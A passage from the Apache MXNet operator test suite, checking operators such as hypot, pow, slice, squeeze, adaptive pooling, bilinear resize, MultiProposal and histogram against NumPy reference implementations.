input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for binary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtypes)
# - Backward: Comparison to NumPy (several dtypes)
# - Finite difference tests (only dtype = float64)
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
        # Loop over dtypes
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@pytest.mark.serial
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
pytest.raises(MXNetError, min)
pytest.raises(MXNetError, max)
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@pytest.mark.serial
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
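    # py_adaptive_avg_pool mirrors the usual adaptive pooling bin layout: output bin o
    # averages input rows [floor(o * isize / osize), ceil((o + 1) * isize / osize));
    # e.g. for isize=10, osize=3 the (possibly overlapping) row bins are [0, 4), [3, 7), [6, 10).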
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
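    # py_bilinear_resize uses the standard bilinear weights: for a fractional source
    # coordinate (h1 + h1lambda, w1 + w1lambda), the output is the weighted sum of the four
    # surrounding pixels with weights (1-h1lambda)*(1-w1lambda), (1-h1lambda)*w1lambda,
    # h1lambda*(1-w1lambda) and h1lambda*w1lambda; the backward reference below scatters
    # the incoming gradient with the same four weights.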
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
data_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, data_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, data_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, data_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
# parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
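# Run the single-image Proposal op on each sample; the batched MultiProposal
# results computed below must match these per-image results.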
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
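# Analytic gradient of the quadratic: d/dx (a*x^2 + b*x + c) = 2*a*x + b.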
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
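# Perturb `base` by up to +/- `percent` percent so the tolerances vary slightly between runs.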
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
# Print the elements of the array that are considered "not close" on this side, together
# with the corresponding elements of the CPU/GPU/Python comparison vectors that are considered "close".
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
# Find the indices of all violations and the corresponding coordinate values
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
idx = np.asarray(np.where(bad_indexes == True))
idx = idx.reshape(1, idx.size)
idx_flat = np.asarray(np.where(bad_indexes.flatten() == True)).flatten()
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@pytest.mark.serial
def test_allclose_function():
allclose_function([default_context()])
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1._bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2._bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
